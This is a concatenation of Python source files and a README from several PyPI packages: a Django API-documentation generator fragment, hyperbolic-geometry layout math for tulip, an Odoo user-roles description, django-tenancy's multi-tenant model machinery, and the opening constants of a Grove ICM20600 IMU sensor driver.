ret[field_name] = str(field.label)
if isinstance(field, fields.ChoiceField):
choices = ",".join(["%s:%s" % (k, v) for k, v in field.choices.items()])
if choices:
ret[field_name] += " (%s)" % choices
return [ret] if force_many else ret
def get_url(head, urlpattern):
"""
组合生成url
"""
url = getattr(urlpattern, 'pattern', urlpattern).regex.pattern
ret = head + url.replace('\\', '').rstrip("$?").lstrip('^')
return ret.replace('//', '/')
def get_view_list(urlpattern=None, head='/', base_view=CoolBFFAPIView):
"""
获取所有接口列表
"""
ret = []
if urlpattern is None:
rooturl = import_module(settings.ROOT_URLCONF)
for urlpattern in rooturl.urlpatterns:
ret += get_view_list(urlpattern, get_url(head, urlpattern), base_view=base_view)
return ret
view_class = urlpattern
for sub in ('callback', 'view_class'):
view_class = getattr(view_class, sub, None)
if view_class is None:
break
if view_class is not None and issubclass(view_class, base_view):
retdict = dict()
retdict['view_class'] = view_class
retdict['params'] = dict()
view = view_class()
get_serializer_class = getattr(view, 'get_serializer_class', None)
if get_serializer_class is not None and callable(get_serializer_class):
try:
serializer_class = get_serializer_class()
if serializer_class is not None:
retdict['params'] = serializer_class().fields
except AssertionError:
pass
# retdict['params'] = view_class._meta.param_fields if issubclass(view_class, CoolBFFAPIView) else None
get_view_name = getattr(view, 'get_view_name', None)
if get_view_name is not None and callable(get_view_name):
retdict['name'] = get_view_name()
else:
retdict['name'] = view_class.__name__
retdict['url'] = head.replace('//', '/').rstrip('/')
ret.append(retdict)
if hasattr(urlpattern, 'url_patterns'):
for pattern in urlpattern.url_patterns:
ret += get_view_list(pattern, get_url(head, pattern), base_view=base_view)
return ret
def base_get_view_info(view_class):
request_info = OrderedDict()
serializer_class = getattr(view_class, 'serializer_class', None)
if serializer_class is not None:
serializer = serializer_class()
for key, field in serializer.fields.items():
request_info[key] = get_field_info(field)
return {
'request_info': request_info,
'response_info': {},
'response_info_format': ""
}
def get_api_info(base_view=CoolBFFAPIView, base_params=(), add_base_view_params=True, exclude_views=()):
"""
获取api接口信息
:param base_view: 接口视图基类
:param base_params: 公共参数
:param add_base_view_params: 基类中参数增加到公共参数
:param exclude_views: 排除接口视图
"""
base_params = list(base_params)
if add_base_view_params and issubclass(base_view, CoolBFFAPIView):
opt = getattr(base_view, '_meta', None)
param_fields = getattr(opt, 'param_fields', dict())
for param_field in param_fields.keys():
if param_field not in base_params:
base_params.append(param_field)
error_codes = ErrorCode.get_desc_dict()
apis = list()
for v in get_view_list(base_view=base_view):
if issubclass(v['view_class'], exclude_views):
continue
has_file = False
post = False
length = 0
no_len_count = 0
for param, field in v['params'].items():
if isinstance(field, fields.FileField):
has_file = True
post = True
if param in ('pass', 'password'):
post = True
if isinstance(field, fields.CharField):
if field.max_length is None:
no_len_count += 1
else:
length += field.max_length
if no_len_count > 3 or length > 200:
post = True
get_view_info = getattr(v['view_class'], 'get_view_info', None)
if get_view_info and callable(get_view_info):
info = get_view_info()
else:
info = base_get_view_info(v['view_class'])
base_params_num = 0
for base_param in base_params:
if base_param in info['request_info']:
info['request_info'][base_param]['base_param'] = True
info['request_info'].move_to_end(base_param, False)
base_params_num += 1
params = list(info['request_info'].keys())[base_params_num:]
apis.append({
'name': v['name'],
'url': v['url'],
'ul_name': v['url'].replace('/', '_').strip('_'),
'info': info,
'self_params': params,
'suggest_method': 'POST' if post else 'GET',
'content_type': 'multipart/form-data' if has_file else 'application/x-www-form-urlencoded',
})
return {
'base_params': base_params,
'error_codes': error_codes,
'apis': apis
}
def get_api_doc(
request=None,
template_name='cool/views/api_doc.md',
base_view=CoolBFFAPIView,
exclude_params=(),
exclude_base_view_params=True,
exclude_views=()
):
"""
生成api文档
:param request: 请求request
:param template_name: 接口模板
:param base_view: 接口视图基类
:param exclude_params: 排除参数
:param exclude_base_view_params: 是否排除基类中参数
:param exclude_views: 排除接口视图
"""
api_info = get_api_info(base_view, exclude_params, exclude_base_view_params, exclude_views)
api_info['server'] = request.build_absolute_uri("/")[:-1] if request is not None else '/'
return render_to_string(template_name, api_info, request)
def get_api_doc_html(
request,
*args,
md_template_name='cool/views/api_doc.md',
base_view=CoolBFFAPIView,
exclude_params=(),
exclude_base_view_params=True,
exclude_views=(),
title=_('Api Document'),
toc_left=True,
**kwargs
):
"""
生成api文档(markdown转html,依赖markdown)
:param request: 请求request
:param md_template_name: 接口模板
:param base_view: 接口视图基类
:param exclude_params: 排除参数
:param exclude_base_view_params: 是否排除基类中参数
:param exclude_views: 排除接口视图
:param title: 文档标题
:param toc_left: 宽浏览器中目录显示在左侧
"""
md = get_api_doc(
request=request,
template_name=md_template_name,
base_view=base_view,
exclude_params=exclude_params,
exclude_base_view_params=exclude_base_view_params,
exclude_views=exclude_views
)
import markdown
html = markdown.markdown(md, extensions=[
'markdown.extensions.toc',
'markdown.extensions.fenced_code',
'markdown.extensions.tables'
])
md_style_template_name = kwargs.get('md_style_template_name', 'cool/views/markdown.html')
return render(request, md_style_template_name, context={'html': html, 'title': title, 'toc_left': toc_left}) | PypiClean |
/tulip_python-5.7.2-cp37-cp37m-win_amd64.whl/tulip/plugins/layout/h3/h3math.py |
import math
import numpy as np
"""
Scaling factor for compute_radius(), compute_hyperbolic_area(),
compute_delta_theta() and compute_delta_phi().
"""
K = 2.0
"""
The 3D coordinate structure
"""
class Point4d(object):
"""
The constructor for Point4d
:param float x: the x coordinate for a node in cartesian space
:param float y: the y coordinate for a node in cartesian space
:param float z: the z coordinate for a node in cartesian space
"""
def __init__(self, x=0.0, y=0.0, z=0.0, w=1.0):
self.x = x
self.y = y
self.z = z
self.w = w
"""
Transform coordinate from spherical space to cartesian space
:param float theta: the theta coordinate for a node in spherical space,
polar angle
:param float phi: the phi coordinate for a node in spherical space,
elevation angle
:param float r: the radius for a node in spherical space, radial distance
"""
def sph_to_cart(self, theta, phi, r):
self.x = r * math.sin(phi) * math.cos(theta)
self.y = r * math.sin(phi) * math.sin(theta)
self.z = r * math.cos(phi)
"""
Add an offset to a node's coordinate in cartesian space
:param Point4d offset: the offset to be added to current node's coordinate
"""
def cart_offset(self, offset):
self.x += offset.x
self.y += offset.y
self.z += offset.z
"""
Translate node's coordinate in cartesian space by translation matrix
:param Point4d offset: the offset to be added to current node's coordinate
"""
def translate(self, offset):
translation_matrix = np.array([[1, 0, 0, offset.x],
[0, 1, 0, offset.y],
[0, 0, 1, offset.z],
[0, 0, 0, 1]])
target = translation_matrix.dot(np.array([self.x, self.y,
self.z, self.w]))
self.x, self.y, self.z, self.w = (target[0], target[1],
target[2], target[3])
"""
Transform node's coordinate in cartesian space by transformation matrix by
spherical space coordinate values
:param float theta: the theta coordinate for a node in spherical space,
polar angle
:param float phi: the phi coordinate for a node in spherical space,
elevation angle
"""
def coordinate_transformation(self, theta, phi):
rotation_matrix = rotation_matrix_z(theta).dot(rotation_matrix_y(phi))
target = rotation_matrix.dot(np.array([self.x, self.y,
self.z, self.w]))
self.x, self.y, self.z, self.w = (target[0], target[1],
target[2], target[3])
"""
Compute the node's hemisphere radius by its hemisphere space reserved
:returns: return the node's radius as a float
"""
def compute_radius(H_p):
return K * math.asinh(math.sqrt(H_p / (2 * math.pi * K * K)))
"""
Compute the parent node's hemisphere radius by its child's hemisphere radius
:returns: return the node's hemisphere space reservation as a float
"""
def compute_hyperbolic_area(radius):
beta = 1.00
return 2 * math.pi * (math.cosh(radius / K) - 1.0) * beta
"""
Compute the proper delta variant value for node's hemisphere placement,
similar to the space reservation the size of the node's hemisphere radius
:returns: return the node's half hemisphere space reservation as angle
delta_theta in spherical space as a float number
"""
def compute_delta_theta(r, rp, phi):
return math.atan(math.tanh(r / K) /
(math.sinh(rp / K) * math.sinh(phi)))
"""
Compute the proper phi variant value for a band of nodes' hemisphere placement,
similar to the space reservation the size of the largest node's hemisphere
radius of the whole band
:returns: return the nodes' max half hemisphere space reservation in the same
band as angle delta_phi in spherical space as a float number
"""
def compute_delta_phi(r, rp):
return math.atan(math.tanh(r / K) / math.sinh(rp / K))
"""
The Klein metric for visualizing hyperbolic space: unusual uses of 4x4 matrices
by Phillips and Gunn
"""
def minkowski(x, y):
return (x.x * y.x + x.y * y.y + x.z * y.z - x.w * y.w)
"""
Calculate 3D hyperbolic distance as a Klein metric
"""
def hyperbolic_distance(x, y):
t1 = minkowski(x, y)
t2 = minkowski(x, x)
t3 = minkowski(y, y)
return (2 * math.acosh(((t1 * t1) / (t2 * t3))**2))
"""
Rotation matrix around X axis
:params: the angle for rotating around X axis
:returns: return the rotation matrix around X axis by the given angle
"""
def rotation_matrix_x(angle):
return np.array([[1, 0, 0, 0],
[0, math.cos(angle), -1 * math.sin(angle), 0],
[0, math.sin(angle), math.cos(angle), 0],
[0, 0, 0, 1]])
"""
Rotation matrix around Y axis
:params: the angle for rotating around Y axis
:returns: return the rotation matrix around Y axis by the given angle
"""
def rotation_matrix_y(angle):
return np.array([[math.cos(angle), 0, math.sin(angle), 0],
[0, 1, 0, 0],
[-1 * math.sin(angle), 0, math.cos(angle), 0],
[0, 0, 0, 1]])
"""
Rotation matrix around Z axis
:params: the angle for rotating around Z axis
:returns: return the rotation matrix around X axis by the given angle
"""
def rotation_matrix_z(angle):
return np.array([[math.cos(angle), -1 * math.sin(angle), 0, 0],
[math.sin(angle), math.cos(angle), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]]) | PypiClean |
/odoo12_addon_base_user_role-12.0.2.1.3-py3-none-any.whl/odoo/addons/base_user_role/readme/DESCRIPTION.rst | This module was written to extend the standard functionality regarding users
and groups management.
It helps creating well-defined user roles and associating them to users.
It can become very hard to maintain a large number of user profiles over time,
juggling with many technical groups. For this purpose, this module will help
you to:
* define functional roles by aggregating low-level groups,
* set user accounts with the predefined roles (roles are cumulative),
* update groups of all relevant user accounts (all at once),
* ensure that user accounts will have the groups defined in their roles
(nothing more, nothing less). In other words, you can not set groups
manually on a user as long as there is roles configured on it,
* activate/deactivate roles depending on the date (useful to plan holidays, etc)
* get a quick overview of roles and the related user accounts.
That way you make clear the different responsabilities within a company, and
are able to add and update user accounts in a scalable and reliable way.
| PypiClean |
/django-tenancy-0.3.1a3.tar.gz/django-tenancy-0.3.1a3/tenancy/models.py | from __future__ import unicode_literals
import copy
import logging
from abc import ABCMeta
from collections import OrderedDict
from contextlib import contextmanager
import django
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.db import connection, models
from django.db.models.base import ModelBase, subclass_exception
from django.db.models.deletion import DO_NOTHING
from django.db.models.fields import Field
from django.dispatch.dispatcher import receiver
from django.utils.deconstruct import deconstructible
from django.utils.six import itervalues, string_types, with_metaclass
from django.utils.six.moves import copyreg
from . import get_tenant_model, settings
from .compat import (
get_private_fields, get_remote_field, get_remote_field_model,
lazy_related_operation, set_remote_field_model,
)
from .management import create_tenant_schema, drop_tenant_schema
from .managers import (
AbstractTenantManager, TenantManager, TenantModelManagerDescriptor,
)
from .signals import lazy_class_prepared
from .utils import (
clear_cached_properties, clear_opts_related_cache, disconnect_signals,
get_model, receivers_for_model, remove_from_app_cache,
)
class TenantModels(object):
__slots__ = ['references']
def __init__(self, tenant):
self.references = OrderedDict((
(reference, reference.for_tenant(tenant))
for reference in TenantModelBase.references
))
def __getitem__(self, key):
return self.references[key]
def __iter__(self, **kwargs):
return itervalues(self.references, **kwargs)
class TenantModelsDescriptor(object):
def contribute_to_class(self, cls, name):
self.name = name
self.tenant_models = {}
setattr(cls, name, self)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return instance.__dict__[self.name]
except KeyError:
pass
tenant_key = instance.natural_key()
try:
models = self.tenant_models[tenant_key]
except KeyError:
models = self.tenant_models[tenant_key] = TenantModels(instance)
self.__set__(instance, models)
return models
def __set__(self, instance, value):
instance.__dict__[self.name] = value
def __delete__(self, instance):
try:
# Use the instance assigned values if available.
models = instance.__dict__[self.name]
except KeyError:
tenant_key = instance.natural_key()
try:
models = self.tenant_models[tenant_key]
except KeyError:
return
for model in models:
model.destroy()
class AbstractTenant(models.Model):
ATTR_NAME = 'tenant'
objects = AbstractTenantManager()
class Meta:
abstract = True
def save(self, *args, **kwargs):
created = not self.pk
save = super(AbstractTenant, self).save(*args, **kwargs)
if created:
create_tenant_schema(self)
return save
def delete(self, *args, **kwargs):
delete = super(AbstractTenant, self).delete(*args, **kwargs)
drop_tenant_schema(self)
return delete
def natural_key(self):
raise NotImplementedError
models = TenantModelsDescriptor()
@contextmanager
def as_global(self):
"""
Expose this tenant as thread local object. This is required by parts
of django relying on global states such as authentification backends.
"""
setattr(connection, self.ATTR_NAME, self)
try:
yield
finally:
delattr(connection, self.ATTR_NAME)
@classmethod
def get_global(cls):
return getattr(connection, cls.ATTR_NAME, None)
@property
def model_name_prefix(self):
return "Tenant_%s" % '_'.join(self.natural_key())
@property
def db_schema(self):
return "tenant_%s" % '_'.join(self.natural_key())
class Tenant(AbstractTenant):
name = models.CharField(unique=True, max_length=20)
objects = TenantManager()
class Meta:
swappable = 'TENANCY_TENANT_MODEL'
def natural_key(self):
return (self.name,)
@deconstructible
class Managed(object):
"""
Sentinel object used to detect tenant managed models.
"""
def __init__(self, tenant_model):
self.tenant_model = tenant_model
def __bool__(self):
# Evaluates to False in order to prevent Django from managing the model.
return False
# Remove when dropping support for Python 2.7
__nonzero__ = bool
def __eq__(self, other):
return isinstance(other, Managed) and other.tenant_model == self.tenant_model
def meta(Meta=None, **opts):
"""
Create a class with specified opts as attributes to be used as model
definition options.
"""
if Meta:
opts = dict(Meta.__dict__, **opts)
return type(str('Meta'), (), opts)
def db_schema_table(tenant, db_table):
if connection.vendor == 'postgresql':
# See https://code.djangoproject.com/ticket/6148#comment:47
return '%s\".\"%s' % (tenant.db_schema, db_table)
else:
return "%s_%s" % (tenant.db_schema, db_table)
class Reference(object):
__slots__ = ['model', 'bases', 'Meta', 'related_names']
def __init__(self, model, Meta, related_names=None):
self.model = model
self.Meta = Meta
self.related_names = related_names
def object_name_for_tenant(self, tenant):
return "%s_%s" % (
tenant.model_name_prefix,
self.model._meta.object_name
)
def for_tenant(self, tenant):
app_label = self.model._meta.app_label
object_name = self.object_name_for_tenant(tenant)
return "%s.%s" % (app_label, object_name)
class TenantSpecificModel(with_metaclass(ABCMeta)):
@classmethod
def __subclasshook__(cls, subclass):
if isinstance(subclass, TenantModelBase):
try:
tenant_model = get_tenant_model()
except ImproperlyConfigured:
# If the tenant model is not configured yet we can assume
# no specific models have been defined so far.
return False
tenant = getattr(subclass, tenant_model.ATTR_NAME, None)
return isinstance(tenant, tenant_model)
return NotImplemented
class TenantDescriptor(object):
__slots__ = ['natural_key']
def __init__(self, tenant):
self.natural_key = tenant.natural_key()
def __get__(self, model, owner):
tenant_model = get_tenant_model()
return tenant_model._default_manager.get_by_natural_key(*self.natural_key)
class TenantApps(object):
def __init__(self, tenant, apps):
self.apps = apps
self.natural_key = tenant.natural_key()
def get_models(self, *args, **kwargs):
models = self.apps.get_models(*args, **kwargs)
return [
model for model in models
if not issubclass(model, TenantSpecificModel) or model._meta.apps.natural_key == self.natural_key
]
def __getattr__(self, name):
return getattr(self.apps, name)
class TenantModelBase(ModelBase):
reference = Reference
references = OrderedDict()
tenant_model_class = None
exceptions = ('DoesNotExist', 'MultipleObjectsReturned')
def __new__(cls, name, bases, attrs):
super_new = super(TenantModelBase, cls).__new__
Meta = attrs.setdefault('Meta', meta())
if (getattr(Meta, 'abstract', False) or
any(issubclass(base, TenantSpecificModel) for base in bases)):
# Abstract model definition and ones subclassing tenant specific
# ones shouldn't get any special treatment.
model = super_new(cls, name, bases, attrs)
if not cls.tenant_model_class:
cls.tenant_model_class = model
else:
# Store managers to replace them with a descriptor specifying they
# can't be accessed this way.
managers = set(
name for name, attr in attrs.items()
if isinstance(attr, models.Manager)
)
# There's always a default manager named `objects`.
managers.add('objects')
if getattr(Meta, 'proxy', False):
model = super_new(
cls, name, bases,
dict(attrs, meta=meta(Meta, managed=Managed(settings.TENANT_MODEL)))
)
cls.references[model] = cls.reference(model, Meta)
else:
# Extract field related names prior to adding them to the model
# in order to validate them later on.
related_names = {}
for attr_name, attr in attrs.items():
if isinstance(attr, Field):
remote_field = get_remote_field(attr)
if remote_field:
related_names[attr.name or attr_name] = remote_field.related_name
for base in bases:
if isinstance(base, ModelBase) and base._meta.abstract:
for field in base._meta.local_fields:
remote_field = get_remote_field(field)
if remote_field:
related_names[field.name] = remote_field.related_name
for m2m in base._meta.local_many_to_many:
related_names[m2m.name] = get_remote_field(m2m).related_name
model = super_new(
cls, name, bases,
dict(attrs, Meta=meta(Meta, managed=Managed(settings.TENANT_MODEL)))
)
cls.references[model] = cls.reference(model, Meta, related_names)
opts = model._meta
# Validate related name of related fields.
for field in (opts.local_fields + get_private_fields(opts)):
remote_field = get_remote_field(field)
if remote_field:
cls.validate_related_name(model, get_remote_field_model(field), field)
# Replace and store the current `on_delete` value to
# make sure non-tenant models are not collected on
# deletion.
on_delete = remote_field.on_delete
if on_delete is not DO_NOTHING:
remote_field._on_delete = on_delete
remote_field.on_delete = DO_NOTHING
for m2m in opts.local_many_to_many:
m2m_remote_field = get_remote_field(m2m)
m2m_related_model = get_remote_field_model(m2m)
cls.validate_related_name(model, m2m_related_model, m2m)
through = m2m_remote_field.through
if (not isinstance(through, string_types) and
through._meta.auto_created):
# Replace the automatically created intermediary model
# by a TenantModelBase instance.
remove_from_app_cache(through)
# Make sure to clear the referenced model cache if
# we have contributed to it already.
if not isinstance(m2m_related_model, string_types):
clear_opts_related_cache(m2m_related_model)
m2m_remote_field.through = cls.intermediary_model_factory(m2m, model)
else:
cls.validate_through(model, m2m_related_model, m2m)
# Replace `ManagerDescriptor`s with `TenantModelManagerDescriptor`
# instances.
for manager in managers:
setattr(model, manager, TenantModelManagerDescriptor(model))
# Extract the specified related name if it exists.
try:
related_name = attrs.pop('TenantMeta').related_name
except (KeyError, AttributeError):
pass
else:
# Attach a descriptor to the tenant model to access the
# underlying model based on the tenant instance.
def attach_descriptor(tenant_model):
descriptor = TenantModelDescriptor(model)
setattr(tenant_model, related_name, descriptor)
app_label, model_name = settings.TENANT_MODEL.split('.')
lazy_class_prepared(app_label, model_name, attach_descriptor)
model._for_tenant_model = model
return model
@classmethod
def validate_related_name(cls, model, rel_to, field):
"""
Make sure that related fields pointing to non-tenant models specify
a related name containing a %(class)s format placeholder.
"""
if isinstance(rel_to, string_types):
lazy_related_operation(cls.validate_related_name, model, rel_to, field=field)
elif not isinstance(rel_to, TenantModelBase):
related_name = cls.references[model].related_names[field.name]
if (related_name is not None and
not (get_remote_field(field).is_hidden() or '%(class)s' in related_name)):
del cls.references[model]
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"Since `%s.%s` is originating from an instance "
"of `TenantModelBase` and not pointing to one "
"its `related_name` option must ends with a "
"'+' or contain the '%%(class)s' format "
"placeholder." % (model.__name__, field.name)
)
@classmethod
def validate_through(cls, model, rel_to, field):
"""
Make sure the related fields with a specified through points to an
instance of `TenantModelBase`.
"""
through = get_remote_field(field).through
if isinstance(through, string_types):
lazy_related_operation(cls.validate_through, model, through, field=field)
elif not isinstance(through, cls):
del cls.references[model]
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"Since `%s.%s` is originating from an instance of "
"`TenantModelBase` its `through` option must also be pointing "
"to one." % (model.__name__, field.name)
)
@classmethod
def intermediary_model_factory(cls, field, from_model):
to_model = get_remote_field_model(field)
opts = from_model._meta
from_model_name = opts.model_name
if to_model == from_model:
from_ = "from_%s" % from_model_name
to = "to_%s" % from_model_name
to_model = from_model
else:
from_ = from_model_name
if isinstance(to_model, string_types):
to = to_model.split('.')[-1].lower()
else:
to = to_model._meta.model_name
Meta = meta(
db_table=field._get_m2m_db_table(opts),
auto_created=from_model,
app_label=opts.app_label,
db_tablespace=opts.db_tablespace,
unique_together=(from_, to),
verbose_name="%(from)s-%(to)s relationship" % {'from': from_, 'to': to},
verbose_name_plural="%(from)s-%(to)s relationships" % {'from': from_, 'to': to}
)
name = str("%s_%s" % (opts.object_name, field.name))
field_opts = {'db_tablespace': field.db_tablespace}
if hasattr(field, 'db_constraint'):
field_opts['db_constraint'] = field.db_constraint
return type(name, (cls.tenant_model_class,), {
'Meta': Meta,
'__module__': from_model.__module__,
from_: models.ForeignKey(
from_model, on_delete=models.CASCADE, related_name="%s+" % name, **field_opts
),
to: models.ForeignKey(
to_model, on_delete=models.CASCADE, related_name="%s+" % name, **field_opts
),
})
@classmethod
def tenant_model_bases(cls, tenant, bases):
return tuple(
base.for_tenant(tenant) for base in bases
if isinstance(base, cls) and not base._meta.abstract
)
def abstract_tenant_model_factory(self, tenant):
if issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on non-tenant specific model.')
reference = self.references[self]
model = super(TenantModelBase, self).__new__(
self.__class__,
str("Abstract%s" % reference.object_name_for_tenant(tenant)),
(self,) + self.tenant_model_bases(tenant, self.__bases__), {
'__module__': self.__module__,
'Meta': meta(
reference.Meta,
abstract=True
),
tenant.ATTR_NAME: TenantDescriptor(tenant),
'_for_tenant_model': self
}
)
opts = model._meta
# Remove ourself from the parents chain and our descriptor
ptr = opts.parents.pop(self)
opts.local_fields.remove(ptr)
delattr(model, ptr.name)
# Rename parent ptr fields
for parent, ptr in opts.parents.items():
local_ptr = self._meta.parents[parent._for_tenant_model]
ptr.name = None
ptr.set_attributes_from_name(local_ptr.name)
# Add copy of the fields to cloak the inherited ones.
fields = (
copy.deepcopy(field) for field in (
self._meta.local_fields +
self._meta.local_many_to_many +
get_private_fields(self._meta)
)
)
for field in fields:
remote_field = get_remote_field(field)
if remote_field:
# Make sure related fields pointing to tenant models are
# pointing to their tenant specific counterpart.
remote_field_model = get_remote_field_model(field)
# Clear the field's cache.
if hasattr(field, '_related_fields'):
delattr(field, '_related_fields')
clear_cached_properties(field)
clear_cached_properties(remote_field)
if isinstance(remote_field_model, TenantModelBase):
if getattr(remote_field, 'parent_link', False):
continue
set_remote_field_model(field, self.references[remote_field_model].for_tenant(tenant))
# If no `related_name` was specified we make sure to
# define one based on the non-tenant specific model name.
if not remote_field.related_name:
remote_field.related_name = "%s_set" % self._meta.model_name
else:
clear_opts_related_cache(remote_field_model)
related_name = reference.related_names[field.name]
# The `related_name` was validated earlier to either end
# with a '+' sign or to contain %(class)s.
if related_name:
remote_field.related_name = related_name
else:
related_name = 'unspecified_for_tenant_model+'
if isinstance(field, models.ManyToManyField):
through = remote_field.through
remote_field.through = self.references[through].for_tenant(tenant)
# Re-assign the correct `on_delete` that was swapped for
# `DO_NOTHING` to prevent non-tenant model collection.
on_delete = getattr(remote_field, '_on_delete', None)
if on_delete:
remote_field.on_delete = on_delete
field.contribute_to_class(model, field.name)
# Some private fields such as GenericRelation are not correctly
# cloaked by `contribute_to_class`. Make sure to remove non-tenant
# private instances from tenant specific model options.
private_fields = get_private_fields(opts)
for private_field in get_private_fields(self._meta):
if private_field in private_fields:
private_fields.remove(private_field)
if private_field in opts.local_fields:
opts.local_fields.remove(private_field)
return model
def _prepare(self):
super(TenantModelBase, self)._prepare()
if issubclass(self, TenantSpecificModel):
for_tenant_model = self._for_tenant_model
# TODO: Remove when dropping support for Django < 1.10
if django.VERSION >= (1, 10):
for mgr_name, manager in for_tenant_model._meta.managers_map.items():
new_manager = copy.copy(manager)
new_manager.creation_counter = manager.creation_counter
self.add_to_class(mgr_name, new_manager)
else:
for _, mgr_name, manager in for_tenant_model._meta.concrete_managers:
new_manager = manager._copy_to_model(self)
new_manager.creation_counter = manager.creation_counter
self.add_to_class(mgr_name, new_manager)
# Since our declaration class is not one of our parents we must
# make sure our exceptions extend his.
for exception in self.exceptions:
subclass = subclass_exception(
str(exception),
(getattr(self, exception), getattr(for_tenant_model, exception)),
self.__module__,
self,
)
self.add_to_class(exception, subclass)
def for_tenant(self, tenant):
"""
Returns the model for the specific tenant.
"""
if issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on non-tenant specific model.')
reference = self.references[self]
opts = self._meta
name = reference.object_name_for_tenant(tenant)
# Return the already cached model instead of creating a new one.
model = get_model(opts.app_label, name.lower())
if model:
return model
meta_attrs = {
# TODO: Use `db_schema` once django #6148 is fixed.
'db_table': db_schema_table(tenant, self._meta.db_table),
'apps': TenantApps(tenant, getattr(reference.Meta, 'apps', apps)),
}
if (1, 10) <= django.VERSION < (2, 0):
meta_attrs['manager_inheritance_from_future'] = True
attrs = {
'__module__': self.__module__,
'Meta': meta(reference.Meta, **meta_attrs),
}
if opts.proxy:
attrs['_for_tenant_model'] = self
# In order to make sure the non-tenant model is part of the
# __mro__ we create an abstract model with stripped fields and
# inject it as the first base.
base = type(
str("Abstract%s" % reference.object_name_for_tenant(tenant)),
(self,), {
'__module__': self.__module__,
'Meta': meta(abstract=True),
}
)
# Remove ourself from the parents chain and our descriptor
base_opts = base._meta
ptr = base_opts.parents.pop(opts.concrete_model)
base_opts.local_fields.remove(ptr)
delattr(base, ptr.name)
bases = (base,) + self.tenant_model_bases(tenant, self.__bases__)
else:
bases = (self.abstract_tenant_model_factory(tenant),)
model = super(TenantModelBase, self).__new__(
TenantModelBase, str(name), bases, attrs
)
return model
def destroy(self):
"""
Remove all reference to this tenant model.
"""
if not issubclass(self, TenantSpecificModel):
raise ValueError('Can only be called on tenant specific model.')
remove_from_app_cache(self, quiet=True)
if not self._meta.proxy:
# Some fields (GenericForeignKey, ImageField) attach (pre|post)_init
# signals to their associated model even if they are abstract.
# Since this instance was created from an abstract base generated
# by `abstract_tenant_model_factory` we must make sure to disconnect
# all signal receivers attached to it in order to be gc'ed.
disconnect_signals(self.__bases__[0])
def __unpickle_tenant_model_base(model, natural_key, abstract):
try:
manager = get_tenant_model()._default_manager
tenant = manager.get_by_natural_key(*natural_key)
tenant_model = model.for_tenant(tenant)
if abstract:
tenant_model = tenant_model.__bases__[0]
return tenant_model
except Exception:
logger = logging.getLogger('tenancy.pickling')
logger.exception('Failed to unpickle tenant model')
def __pickle_tenant_model_base(model):
if issubclass(model, TenantSpecificModel):
tenant = getattr(model, get_tenant_model().ATTR_NAME)
return (
__unpickle_tenant_model_base,
(model._for_tenant_model, tenant.natural_key(), model._meta.abstract)
)
return model.__name__
copyreg.pickle(TenantModelBase, __pickle_tenant_model_base)
class TenantModelDescriptor(object):
__slots__ = ['model']
def __init__(self, model):
self.model = model
def __get__(self, tenant, owner):
if not tenant:
return self
return tenant.models[self.model]._default_manager
class TenantModel(with_metaclass(TenantModelBase, models.Model)):
class Meta:
abstract = True
@receiver(models.signals.class_prepared)
def attach_signals(signal, sender, **kwargs):
"""
Re-attach signals to tenant models
"""
if issubclass(sender, TenantSpecificModel):
for signal, receiver_ in receivers_for_model(sender._for_tenant_model):
signal.connect(receiver_, sender=sender)
def validate_not_to_tenant_model(model, to, field):
"""
Make sure the `to` relationship is not pointing to an instance of
`TenantModelBase`.
"""
if isinstance(to, string_types):
lazy_related_operation(validate_not_to_tenant_model, model, to, field=field)
elif isinstance(to, TenantModelBase):
remove_from_app_cache(model, quiet=True)
raise ImproperlyConfigured(
"`%s.%s`'s `to` option` can't point to an instance of "
"`TenantModelBase` since it's not one itself." % (
model.__name__, field.name
)
)
@receiver(models.signals.class_prepared)
def validate_relationships(signal, sender, **kwargs):
"""
Non-tenant models can't have relationships pointing to tenant models.
"""
if not isinstance(sender, TenantModelBase):
opts = sender._meta
# Don't validate auto-intermediary models since they are created
# before their origin model (from) and cloak the actual, user-defined
# improper configuration.
if not opts.auto_created:
for field in opts.local_fields:
remote_field = get_remote_field(field)
if remote_field:
validate_not_to_tenant_model(sender, get_remote_field_model(field), field)
for m2m in opts.local_many_to_many:
validate_not_to_tenant_model(sender, get_remote_field_model(m2m), m2m) | PypiClean |
/Seeed_grove.py-0.2.tar.gz/Seeed_grove.py-0.2/grove/grove_imu_9dof_icm20600_ak09918.py | from __future__ import division
from __future__ import print_function
from ctypes import *
from ctypes import util
import sys
from grove.i2c import Bus
ICM20600_I2C_ADDR0 = 0x68
ICM20600_I2C_ADDR1 = 0x69
ICM20600_RANGE_250_DPS, \
ICM20600_RANGE_500_DPS, \
ICM20600_RANGE_1K_DPS, \
ICM20600_RANGE_2K_DPS = 0, 1, 2, 3
ICM20600_RANGE_2G, \
ICM20600_RANGE_4G, \
ICM20600_RANGE_8G, \
ICM20600_RANGE_16G = 0, 1, 2, 3
ICM20600_GYRO_RATE_8K_BW_3281, \
ICM20600_GYRO_RATE_8K_BW_250, \
ICM20600_GYRO_RATE_1K_BW_176, \
ICM20600_GYRO_RATE_1K_BW_92, \
ICM20600_GYRO_RATE_1K_BW_41, \
ICM20600_GYRO_RATE_1K_BW_20, \
ICM20600_GYRO_RATE_1K_BW_10, \
ICM20600_GYRO_RATE_1K_BW_5 = 0, 1, 2, 3, 4, 5, 6, 7
ICM20600_ACC_RATE_4K_BW_1046,\
ICM20600_ACC_RATE_1K_BW_420, \
ICM20600_ACC_RATE_1K_BW_218, \
ICM20600_ACC_RATE_1K_BW_99, \
ICM20600_ACC_RATE_1K_BW_44, \
ICM20600_ACC_RATE_1K_BW_21, \
ICM20600_ACC_RATE_1K_BW_10, \
ICM20600_ACC_RATE_1K_BW_5 = 0, 1, 2, 3, 4, 5, 6, 7
ICM20600_ACC_AVERAGE_4, \
ICM20600_ACC_AVERAGE_8, \
ICM20600_ACC_AVERAGE_16,\
ICM20600_ACC_AVERAGE_32 = 0, 1, 2, 3
ICM20600_GYRO_AVERAGE_1, \
ICM20600_GYRO_AVERAGE_2, \
ICM20600_GYRO_AVERAGE_4, \
ICM20600_GYRO_AVERAGE_8, \
ICM20600_GYRO_AVERAGE_16, \
ICM20600_GYRO_AVERAGE_32, \
ICM20600_GYRO_AVERAGE_64, \
ICM20600_GYRO_AVERAGE_128 = 0, 1, 2, 3, 4, 5, 6, 7
